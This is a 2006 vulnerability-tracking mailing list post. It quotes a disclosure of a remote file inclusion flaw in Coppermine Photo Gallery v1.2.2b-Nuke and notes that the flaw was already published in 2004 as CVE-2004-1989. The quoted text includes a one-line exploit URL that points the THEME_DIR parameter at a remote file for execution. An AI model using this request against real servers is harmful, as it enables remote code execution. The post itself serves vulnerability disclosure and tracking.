[VIM] Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

security curmudgeon jericho at attrition.org
Sun Sep 24 15:52:58 EDT 2006


Reference:
http://archives.neohapsis.com/archives/bugtraq/2006-07/0528.html

On Fri, 28 Jul 2006, A-S-T2006 at hotmail.com wrote:

:  ----------------------------------------------------
:  Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities   

:  Vulnerable: Coppermine Photo Gallery v1.2.2b-Nuke                      

:  Exploit:
:  www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://evalcode.txt
:  ----------------------------------------------------------------------------------------------------
:  Discovered By A-S-T TEAM

This was disclosed on 2004-04-29 by Waraxe:

http://www.waraxe.us/index.php?modname=sa&id=26
http://archives.neohapsis.com/archives/bugtraq/2004-05/0009.html
CVE-2004-1989
BID:10253
OSVDB:5912
SECTRACK:1010001
SECUNIA:11524
XF:coppermine-multiple-file-include(16041)



More information about the VIM mailing list